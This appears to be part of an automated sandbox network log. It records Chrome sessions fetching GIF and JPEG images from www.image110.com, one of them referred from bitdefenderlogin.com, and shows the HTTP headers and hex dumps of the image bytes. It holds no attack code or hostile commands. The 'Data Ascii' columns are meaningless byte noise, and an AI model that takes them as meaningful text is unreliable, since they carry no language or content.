                                                                                                                                                          2024-06-09 22:40:38 UTC3098INData Raw: de f1 0a ce 67 d0 89 dd 33 28 c8 c5 63 98 4d 55 4d 25 3a c9 dd 46 59 56 29 88 98 a6 54 41 c8 39 30 81 a3 55 12 94 6a 2f 4e d2 7c b5 e6 c8 64 5c d1 b1 33 cb 25 0b 32 58 a6 23 b1 d4 09 59 a3 0a 55 ca b0 1c ca ea a5 17 ef 81 c1 a6 93 70 d7 a3 15 28 60 64 92 30 17 bb 18 49 7a 90 0d 35 5d 48 e9 3f d7 d7 f8 27 8e 3e 2f 8a e5 b4 47 16 eb 5e d5 e3 cf be 7a c7 57 d0 9b a8 8d d7 45 dd b3 ea 35 91 47 47 70 56 c0 e1 58 08 37 37 c7 69 c2 2e 63 33 48 c9 3b 59 cb e9 56 df 1f 82 2f 08 97 b2 60 5b 2b 94 c8 5c 58 ab 62 b3 98 5c 6e 36 03 fb 38 ab c9 2a 69 f1 fb cc 22 05 be 27 50 02 a1 f8 95 27 9f 1d 2a 53 af 09 79 6d d0 bb 6a d4 9f 79 e4 55 3f a8 75 72 f8 7c 79 91 f2 3a 71 e8 a2 d5 35 2c 1f 55 83 9c e6 6c 07 c9 1e 5d 83 3d 92 59 ce 8f cd d6 4c ce 85 aa 50 a5 d9 19 53 bc 16
                                                                                                                                                          Data Ascii: g3(cMUM%:FYV)TA90Uj/N|d\3%2X#YUp(`d0Iz5]H?'>/G^zWE5GGpVX77i.c3H;YV/`[+\Xb\n68*i"'P'*SymjyU?ur|y:q5,Ul]=YLPS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          41192.168.2.549764103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:37 UTC359OUTGET /uploads/zuobian.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 181313
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:26:03 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfcb-2c441"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16036INData Raw: 47 49 46 38 39 61 80 00 0e 02 f7 ff 00 ff ef 43 af 8f 63 cd 9e 71 bc e7 ef 91 b5 f7 93 24 35 cf d8 d6 59 2a 59 1d 34 8a 05 29 ef 6b 8d fd 6e 94 93 4c 6f fb b7 cb cc 13 2b 6e ae 31 46 cf e8 ce fe 00 00 26 45 91 ca de f3 de ee ed 2f 56 ff 5c 6d 94 a4 cc b5 b5 74 7b ad de f7 64 4c 28 d1 7b 7b e7 ef ee f6 f1 73 0a c6 e4 d8 ae 85 93 2e 46 ae b0 b4 e9 da 39 61 d0 e7 2c 4b 63 ee f2 d3 ea b7 8d 9f 6b 9c 27 30 6f 95 af af da 8d 97 d3 d6 b5 dd e8 ae d1 b1 b1 0d 23 56 f5 d2 aa 01 b2 ed b0 b9 c7 b1 8c 90 91 73 4a 06 92 d5 2f 2d 29 06 15 48 88 60 30 8a 95 aa dd f7 fa 91 8f 8a 5b 82 fc 74 16 29 cb be c8 30 29 55 f3 4e 53 6e 72 72 a2 bd f9 4f 86 7c ed f0 91 19 42 ff ec f7 ee 70 23 36 f7 fc e6 8b d6 ee 74 69 4e 4b 4b 48 0a 09 0b 45 6c 6f ea 75 79 cf b2 3e a9 c8 f8 f1 c6
                                                                                                                                                          Data Ascii: GIF89aCcq$5Y*Y4)knLo+n1F&E/V\mt{dL({{s.F9a,Kck'0o#VsJ/-)H`0[t)0)UNSnrrO|Bp#6tiNKKHElouy>
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 50 6a fe d0 9a fc a2 0d 4e da 81 26 d1 9a 21 c3 eb c5 4e a6 a9 dc 28 1a 05 a8 45 a3 47 89 cb 09 c1 42 8c 34 8b 4a 0c 00 56 50 db 9f 1c 03 ac 79 c6 63 79 52 e6 61 85 87 86 92 80 01 d8 5d e8 e7 a2 51 96 d6 f4 0c 5f a6 e8 c1 34 1d 3d b6 e8 04 f5 43 02 b0 01 c4 38 cc 78 8e dc 78 5e a0 85 4d c6 84 3e 4e 93 5c c7 2d 8c cc 14 5d 07 2f b8 82 23 b5 65 2d e0 42 27 e1 02 00 6d 9e 4c 15 a5 47 64 16 47 ac e0 4a 31 e9 b3 f8 85 b3 3c e9 8a 4a 5a f7 c5 ce 39 1d 08 05 1a aa 6a 1d 48 a4 30 e6 2d 2c c8 52 3d 85 06 b6 67 b6 69 06 f0 40 09 2f ac a9 59 c8 9a 71 d5 1a 67 f4 1f 80 81 c4 2f d4 e9 a8 9e e3 25 01 a0 9e a2 ea 6a a2 4e d3 0d c6 77 02 49 45 1d 48 36 18 88 27 f4 c8 90 30 c0 84 bd e4 b3 b5 5c 53 c8 84 d3 d9 0a 60 f0 c2 bc 6d 85 c0 15 ca 31 4c 99 40 44 56 64 21 e7 27 79
                                                                                                                                                          Data Ascii: PjN&!N(EGB4JVPycyRa]Q_4=C8xx^M>N\-]/#e-B'mLGdGJ1<JZ9jH0-,R=gi@/Yqg/%jNwIEH6'0\S`m1L@DVd!'y
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 53 4b 41 58 a1 1a 10 04 03 d0 02 35 b8 28 72 f9 18 29 1d 35 b3 53 b7 e5 04 31 0e ab d0 34 2b 4c 0c 55 55 4e 0c 41 58 08 45 87 7c 55 35 4c 43 63 e8 84 41 43 47 f9 a0 c1 5b b4 81 de 83 99 af 08 8c 16 70 06 19 e8 9b 3d 90 85 c7 7c cf 22 88 87 78 78 07 74 80 85 49 b0 02 41 70 86 49 f0 81 70 30 80 ad 23 81 fb 5c 82 49 50 8a 29 68 00 20 48 81 12 08 81 98 24 b6 a8 ca 9b c4 d0 01 75 1b 55 2f 34 bb c1 44 b3 82 24 3f 78 8b 39 d4 eb 44 35 5d 48 34 94 55 58 38 82 10 18 b4 0a aa 48 b2 59 08 fd 3b 00 cd cc d3 60 15 08 35 e8 04 40 6d 81 16 e8 81 31 58 81 06 28 82 7c d8 cf 14 80 d8 4a 00 31 25 58 02 1c 88 87 f0 e9 04 6e 50 03 41 78 07 dc a4 80 1e 58 01 1d a8 01 88 39 8e 8f 48 82 63 1c bb 0f 5b 37 51 fd b0 0f 6c 57 0e 20 53 78 c3 d0 56 53 3b 0e f0 44 58 95 46 58 55 43 86
                                                                                                                                                          Data Ascii: SKAX5(r)5S14+LUUNAXE|U5LCcACG[p=|"xxtIApIp0#\IP)h H$uU/4D$?x9D5]H4UX8HY;`5@m1X(|J1%XnPAxX9Hc[7QlW SxVS;DXFXUC
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 0c d0 85 f2 98 4b 79 ad f0 93 e2 10 83 98 91 48 cf 08 d0 f9 07 28 1e c0 85 d0 a5 a4 31 20 4b cc 4b fc 64 1f aa 39 c0 ff 05 30 69 12 66 5c b0 09 5e c8 20 0e bf 2a 89 17 a8 d0 05 ab 18 25 40 9d 41 05 10 c6 a1 8e 75 10 92 90 ee 52 22 2d 1e d9 3b 59 70 60 24 45 e0 c5 3f 78 61 8c 22 6c f3 92 3a f8 95 ca f6 a3 b8 56 fc 29 54 4c 12 e5 47 7e 45 9d c8 88 0e 61 f1 39 c9 01 5a 41 02 0b 84 61 6a 7e 5a 1c 4e ee e9 99 18 f0 02 51 7b 98 81 0c d4 40 85 e4 1d 0f 90 a5 ca 92 3a e0 95 50 be 3d a8 36 09 65 e2 3f 22 69 21 5e 70 93 9b 97 34 06 2c 38 20 88 5f 45 ee 26 15 fc e4 e2 a4 76 ac 2e 22 06 32 26 1a d6 03 c6 56 92 1c ea f0 00 74 b0 80 31 70 b0 c5 27 d5 64 26 24 18 4b 03 0c 30 09 1d f4 c0 00 06 68 80 1a a0 b5 11 51 79 66 2c b5 bb 19 de 20 a4 c8 7f 10 10 a2 ad 32 86 31 b4
                                                                                                                                                          Data Ascii: KyH(1 KKd90if\^ *%@AuR"-;Yp`$E?xa"l:V)TLG~Ea9ZAaj~ZNQ{@:P=6e?"i!^p4,8 _E&v."2&Vt1p'd&$K0hQyf, 21
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 14 d4 64 fb 89 ff 70 fc 0f 07 ac 71 4b 32 ca 1a 9c e1 86 45 c7 fd 38 17 1d 36 d0 51 ba 21 46 18 c1 c9 f3 5d 39 ff a3 59 28 9c a4 08 f6 3e 38 4e 42 62 89 47 68 96 0f 07 ec c1 2f 98 01 cf 54 20 7c 34 1d 50 35 5a 74 68 42 97 f8 5d c4 f5 f5 45 1c ad 54 03 89 b2 ff 13 ff bb ee 1b 23 b3 b1 ed 58 23 c0 95 c4 21 65 37 38 c3 bd 94 90 1c 8b 44 aa 75 16 52 04 e9 0c 61 10 83 48 d0 0b 07 f8 91 22 ca e4 00 ec 5d cf 37 60 31 8b e5 ca d2 8a 03 c0 47 0a 4c e3 d2 55 74 02 02 4b 70 02 10 2e f4 81 21 64 c6 03 10 ec 61 0f 51 e8 9a c3 e8 f7 8f 1a e0 80 16 ca b0 dd 3b 28 a0 b6 da fd a3 4f 6e 3b a2 dc 04 a8 b2 52 cc e0 0e 3d 80 40 0f 70 a0 84 bd 44 01 32 56 b0 d0 6f 20 e8 93 2d 1a 62 8b ad 80 0c 4a 52 a2 18 9f a0 e0 2b df fb 60 83 0e b0 15 9a 58 42 4b 7b 68 e3 3f 38 21 c7 39 16
                                                                                                                                                          Data Ascii: dpqK2E86Q!F]9Y(>8NBbGh/T |4P5ZthB]ET#X#!e78DuRaH"]7`1GLUtKp.!daQ;(On;R=@pD2Vo -bJR+`XBK{h?8!9
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 80 11 1e 46 40 1c 30 e4 80 84 0b 1b 36 5c f8 68 15 d3 45 2b 14 95 34 b9 70 60 28 0a 0f 91 9c 40 ba 89 e3 e5 9f a6 99 2e 62 26 5d ea 74 a9 c2 a8 0a ff b9 e8 c2 04 87 84 a9 12 1d b8 48 d8 8a eb 57 ae 28 0e 98 e4 21 70 20 da 7f 07 50 20 f8 47 62 92 92 2e 33 d4 c0 9d a4 46 4d 17 20 4c 24 fe f3 71 f2 9f ca 82 07 cf 9a 35 f8 60 4f 19 40 24 5a ff 59 69 ac e8 a9 c2 4a 16 98 cc f4 2b 12 44 94 38 ff 8c d2 f9 27 33 a9 8d a4 a0 9f 3a e5 ba 70 6a 9d 24 9a 1c 48 60 cb 76 a0 a2 af 5f bb 4e 24 cb 63 a0 40 83 27 0f 1e f8 aa 88 84 96 48 5f 04 fc 0b a0 a5 13 86 3b 63 e2 4d 62 08 11 ad 6e 81 20 a4 48 01 6c 98 8b 14 34 9e 6d 84 09 43 c2 47 63 99 9f d5 5c a8 64 c3 47 1c 46 5d 8c 68 8e e3 06 2d 1d 1b 48 3f 87 16 af 94 34 57 17 28 56 7d d0 41 c2 01 02 6c 21 10 20 55 b2 f5 84 13
                                                                                                                                                          Data Ascii: F@06\hE+4p`(@.b&]tHW(!p P Gb.3FM L$q5`O@$ZYiJ+D8'3:pj$H`v_N$c@'H_;cMbn Hl4mCGc\dGF]h-H?4W(V}Al! U
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 69 5f 7e 41 c2 5d 69 c2 75 00 75 08 03 1b 98 bc 07 8d d4 80 f5 53 f6 3b 5d 17 66 c5 18 de e9 dc 75 61 17 86 61 9f 76 61 de dd 43 2f 30 04 9d 0d 6a 9f 2e 04 25 00 04 25 88 02 24 8c 5b 2f 40 42 2f 36 e7 dc e3 e8 96 7b 39 e0 05 e7 28 18 4e 3b ad d3 7f a0 03 9e 3d 67 3f 55 47 e6 24 81 96 f6 87 1e 90 00 79 a6 cc 07 be e9 5d 86 bc 56 38 80 fa cd d4 4c 15 db 7f 58 c2 0f 04 e1 07 9d e9 2b 9e 64 49 96 64 43 c8 d9 c6 d4 e9 37 bc c3 3b 15 c7 ae 46 05 aa 1e 3b 8e 36 50 90 04 5e db fb e8 38 f8 d1 53 d6 04 90 ec d7 e0 dd 55 ca 2c cf 5e fd 07 3f c6 de 39 16 e4 93 d6 40 5c 3d 5d 4e 28 00 4f 0d 53 d2 3d 00 df 43 80 56 80 c9 c9 1d 40 ff bb e2 61 e6 5c 3c 9d dd d8 7d df 70 14 dd 3b 74 b9 ff 9a 23 df ad db d7 dc 9b 64 0d d4 df aa 64 c5 71 76 88 cb de 59 e1 e5 d7 5d f6 40 18
                                                                                                                                                          Data Ascii: i_~A]iuuS;]fuaavaC/0j.%%$[/@B/6{9(N;=g?UG$y]V8LX+dIdC7;F;6P^8SU,^?9@\=]N(OS=CV@a\<}p;t#ddqvY]@
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: b9 7f a8 51 63 30 80 05 00 50 c2 d4 d1 55 64 4a e0 ac c8 b6 15 d1 9b dd 55 99 95 5b 5e 2d 54 29 b8 59 2e b0 84 03 b0 82 1a 48 02 82 6d 44 ff 8f e8 8e c0 f5 50 ee 2c 05 ef 9c 58 0e ed d4 6c 15 d1 56 68 c6 4c 5c c6 e7 95 dc 05 dc c4 b7 e4 43 45 50 04 12 c0 01 03 70 86 8e a5 00 35 9d 51 0e c8 87 06 28 db 96 ed cf dd db 53 b5 f5 cd b6 75 dd 8d f8 d5 5d 15 54 b9 bd 52 5f ad 5b 29 b0 04 29 28 04 03 a4 03 25 e8 02 08 1d da 26 25 13 37 f8 4e 23 38 5c f1 54 de 88 cd d6 4e 65 da 34 5c 60 6e 95 de b7 34 4f 1e ac c8 ee 0b 83 4d 50 87 8e 8d 87 12 a8 d1 23 f8 07 75 b0 00 4f 44 80 fd ec c3 57 84 45 85 10 47 3e ac 57 8e 10 52 5e fd 55 b9 65 04 46 58 e1 07 d8 55 4b 28 03 40 70 01 2b 58 82 33 b8 01 05 6b 52 ed 50 a7 0e 25 da 0e 6d 96 b5 ec 54 21 0d 52 23 f0 01 17 50 84 ee
                                                                                                                                                          Data Ascii: Qc0PUdJU[^-T)Y.HmDP,XlVhL\CEPp5Q(Su]TR_[))(%&%7N#8\TNe4\`n4OMP#uODWEG>WR^UeFXUK(@p+X3kRP%mT!R#P
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 99 24 81 53 6c ca d8 84 04 da 34 c5 c2 b4 87 09 c8 cd e2 79 07 51 98 83 3b f4 4d f9 2c 48 df 3c 45 bf 1c 4e 09 00 04 40 50 05 14 45 51 b1 8c b3 cc 3c a7 63 22 a6 b4 5c c0 72 ab 34 0c f8 07 63 92 1e a0 18 26 23 f8 07 1e f0 02 46 f0 02 23 30 82 03 f0 02 1b 70 80 ef 1c 4e a6 44 00 24 d5 c6 3b 2c cf 18 98 80 f3 2c 1a 75 88 07 73 c8 ca 39 8c 49 25 35 48 af cc 46 07 40 81 42 e0 84 32 28 84 32 28 d3 32 10 53 42 98 bb 19 28 05 ff 18 65 ce 73 6c b6 e6 23 84 04 84 28 70 41 98 7f 30 02 1e e0 81 7f 60 04 1e 30 02 2f 10 52 43 c8 4b 54 94 00 92 04 51 14 20 54 27 3d c3 4d 10 03 ef 2a 1a 0e 88 87 10 98 43 26 1c 45 f7 4c 0a 3c fc 4d 3c 44 01 40 28 03 34 40 03 39 f8 54 4f ed 54 4c 78 ae 86 03 39 e5 24 a6 6e 91 41 57 54 bf 62 9a 30 a0 2b 05 23 c8 4f 46 f0 51 2f 88 03 46 30
                                                                                                                                                          Data Ascii: $Sl4yQ;M,H<EN@PEQ<c"\r4c&#F#0pND$;,,us9I%5HF@B2(2(2SB(esl#(pA0`0/RCKTQ T'=M*C&EL<M<D@(4@9TOTLx9$nAWTb0+#OFQ/F0
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 01 1c 74 c3 37 4b 7f 71 bc e7 cd 6c 75 34 80 df 90 f8 07 d5 7d c1 10 12 28 42 09 5f fe 87 0c 00 da 56 dd 96 f3 0e ac fd c7 06 5c be 01 a1 12 d2 04 02 24 03 06 64 3d 83 76 fd c3 06 ff 70 01 09 24 60 01 09 b8 c0 05 42 8f 41 8d 7c e5 1b ac ca f8 e9 f1 15 45 0a 4e ce 91 ab ff c3 01 80 20 44 22 87 b7 90 1b 14 3c 00 a7 88 5c cb c7 be da f0 0a e0 d6 8d a6 5c f2 f6 02 1b b9 2b 9e 09 8a 0f 7d 18 70 20 06 51 8c e3 ef 1a 99 c5 2d 5a 02 58 98 c2 74 77 62 38 3c 02 24 70 7b 8e 20 00 10 82 e0 39 97 4b ff 11 79 d7 be d6 e5 93 0f e5 29 33 ed dd e2 6d 17 b1 6a d8 8b 0d 34 e1 fc b9 1f 9d 04 0b 89 be 05 de d7 f7 de 2c 7d 21 4e 83 26 bd e3 2b 75 eb ff e3 f6 12 60 08 f9 1d 22 01 41 40 41 00 06 6c 6b 29 b8 2b 6b ca 8b f2 14 68 c7 ec 06 32 5d 39 f2 ae 35 00 49 78 7e 2b fe 61 05
                                                                                                                                                          Data Ascii: t7Kqlu4}(B_V\$d=vp$`BA|EN D"<\\+}p Q-ZXtwb8<$p{ 9Ky)3mj4,}!N&+u`"A@Alk)+kh2]95Ix~+a


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          42192.168.2.549765103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC361OUTGET /uploads/hg128-526.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 57501
                                                                                                                                                          Last-Modified: Mon, 29 Apr 2024 10:08:12 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "662f718c-e09d"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16038INData Raw: 47 49 46 38 39 61 80 00 0e 02 f7 ff 00 e5 e8 e7 0c 6b 59 ef cc 16 d6 97 07 2c 6f 52 16 1a 1f f3 e5 79 c7 c7 c7 68 8c 50 10 98 83 b9 cd ca 28 32 48 0c 73 61 57 6d 3e a8 c3 bc 95 71 5c f3 d5 35 9b ad 6e b0 b0 50 92 95 2f f3 e8 87 8f ad a8 cd b4 28 f3 d8 44 4a 76 49 d3 a8 0e d0 a8 92 8e 91 8d f3 df 66 52 85 51 0b 4b 3b b0 8a 70 10 73 61 fb ff fe 68 8d 67 10 82 6b a5 bb b5 ee c9 b4 f7 ee 9c 51 87 73 9b a5 52 f6 d9 c9 d3 ce 6f ef cf 21 ba bb bb cf d2 8c 10 59 48 fa e5 d6 10 72 5c b1 a8 34 90 a7 97 eb c5 48 d1 c5 56 33 3f 5a 10 6b 59 0c 69 54 d7 df dd 10 7c 68 d3 b7 a7 0c 89 74 85 97 49 0c 61 4d ae a7 91 10 63 51 0c 71 5d 2c 83 6c f3 eb 93 6f 86 36 10 79 64 ea ac 05 ed cd 56 2d 74 64 47 76 69 6a 94 8b 8d 90 73 d1 c7 b0 db e9 ed b3 90 13 e0 63 65 f6 f6 f6 ac 97
                                                                                                                                                          Data Ascii: GIF89akY,oRyhP(2HsaWm>q\5nP/(DJvIfRQK;psahgkQsRo!YHr\4HV3?ZkYiT|htIaMcQq],lo6ydV-tdGvijsce
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 81 4e a7 34 0d 10 00 7f e0 5d 07 04 35 4a ab 40 2d 24 0f 08 20 00 52 3f 75 4c f3 ad d4 3e 94 8b 1c b0 b2 4e 6a 4b cd 88 12 70 01 07 70 35 0d c4 0c ca b8 40 18 e8 42 57 97 35 57 4b 00 94 ac 2a da 6e b5 59 97 35 0f 74 03 50 f8 90 31 10 80 0a 70 b5 5d 77 b5 0a 10 75 67 1a 10 0f b4 b5 5d d7 42 d5 58 cf 09 a0 80 04 74 6b 04 94 35 0d 14 36 0d d8 75 f5 16 76 b7 d6 42 6b 2e 52 e1 56 f2 1c 6c c3 38 d4 c3 fd ad 4d 38 f0 00 20 70 ff 81 16 70 01 20 90 f2 45 82 03 0f e8 82 67 83 f6 69 77 f6 50 4f c6 bc f8 82 04 7c 76 67 c3 f6 69 4b 40 4e dc 00 4e 20 81 2e c4 36 6a c3 b6 16 20 41 3b 76 49 04 a4 b6 70 9b 73 5b 26 c8 30 1d 08 6c 47 00 6d a0 c0 69 23 40 ff 92 a7 56 84 02 fd 79 52 a7 62 f5 47 a7 8e 1c f0 c0 05 00 c2 76 5f 00 0f bc d0 90 68 37 77 03 02 0d a0 00 61 e7 f6 76
                                                                                                                                                          Data Ascii: N4]5J@-$ R?uL>NjKpp5@BW5WK*nY5tP1p]wug]BXtk56uvBk.RVl8M8 pp EgiwPO|vgiK@NN .6j A;vIps[&0lGmi#@VyRbGv_h7wav
                                                                                                                                                          2024-06-09 22:40:39 UTC16384INData Raw: 80 57 12 60 eb 8a 8e 86 0a c0 01 88 7e 82 c7 ae 68 1c 50 80 5e 80 01 c5 f6 07 00 18 d8 31 a8 68 29 00 81 4c a8 e8 31 00 e6 2d 1d df bd f4 1a 05 a8 e8 7d 3e 03 53 a8 69 7f 50 00 ba 3e 83 6a c0 8a c5 a6 ed da 66 ec b3 b0 ed dc 66 eb 74 c1 6c dd a6 6d 1c f0 40 07 a0 6d 4a e8 ed da c6 81 1b 44 82 96 be 6a 06 a0 83 d6 1e 83 4c b8 87 8a ce 84 4c 08 02 2e 25 02 a1 bd 4d 88 c6 84 4e f0 6d 7f 38 83 6d 78 87 0a e8 84 5b 88 06 b6 ff 06 00 f1 16 ee 8a 96 06 12 b8 05 49 a0 90 ee b6 6d e4 b8 05 f8 5e 6c 1c d8 09 29 f0 07 3b 48 82 13 c0 01 1c 50 6c 1c 70 00 1c f0 07 ca 16 70 1c b8 b5 1b f0 02 88 ee 82 20 e8 6e 3a d8 52 b8 ad 56 50 a8 68 16 98 6f df 3e 03 a7 48 87 56 50 6e 7f 40 05 ba 06 05 bb f6 07 07 a0 da 83 08 8e 6a 83 0b e5 46 82 75 a9 5a e6 40 e5 75 39 e9 7b 20 80
                                                                                                                                                          Data Ascii: W`~hP^1h)L1-}>SiP>jfftlm@mJDjLL.%MNm8mx[Im^l);HPlpp n:RVPho>HVPn@jFuZ@u9{
                                                                                                                                                          2024-06-09 22:40:39 UTC8695INData Raw: e9 99 92 cd 11 c9 a3 93 53 51 19 1a 94 26 59 f9 94 96 b5 61 49 12 97 b7 49 99 23 98 a7 79 f9 a5 98 36 92 79 94 9a bf 99 09 12 9b c1 b9 f9 26 9a 30 c2 d9 9a 9c 21 e2 a9 9b 9e 24 d2 a9 a2 9d 3f 01 0a 1b 9f 1c 09 da 93 a1 b3 11 6a 93 9f 23 22 9a 93 a3 38 41 fa 18 a3 20 4a 4a 93 a5 bd 29 1a 16 a5 1d 62 1a 23 a7 d2 79 7a a3 a6 9b 92 7a 1c a8 d5 a1 7a 5d 69 22 44 d0 89 2d 11 d4 ff 52 cd 46 76 d4 12 41 0b 9d 44 d0 0a 06 1c b5 4a 45 0b 54 44 20 02 47 48 80 42 45 27 2d c4 9a 07 47 c3 b8 8a 6b 04 c3 68 b4 84 1e d4 56 6b ed b5 d6 2e 01 a4 45 11 54 82 6d 25 ff b8 40 06 19 15 11 60 0b b6 d4 da 32 eb 45 4a 34 82 6e 23 ad 60 44 40 0b e8 ea 61 cb b2 17 b5 e2 ed b7 74 50 04 02 03 44 c0 f0 4f bd 04 53 db c2 b6 13 d5 d1 42 25 26 30 ec b0 09 ff 98 40 85 1c e1 b8 b0 8d 44 1d
                                                                                                                                                          Data Ascii: SQ&YaII#y6y&0!$?j#"8A JJ)b#yzzz]i"D-RFvADJETD GHBE'-GkhVk.ETm%@`2EJ4n#`D@atPDOSB%&0@D


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          43192.168.2.549767103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC627OUTGET /uploads/27eeee660ef8e616ea1edc3bb1bad1ca.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 39179
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:18 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf62-990b"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16037INData Raw: ff d8 ff e1 0e 78 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 31 3a 31 38 20 32 33 3a 35 38 3a 35 35 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 4e a0 03 00 04 00 00 00 01 00 00 00 51 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00
                                                                                                                                                          Data Ascii: xExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2022:11:18 23:58:55NQ
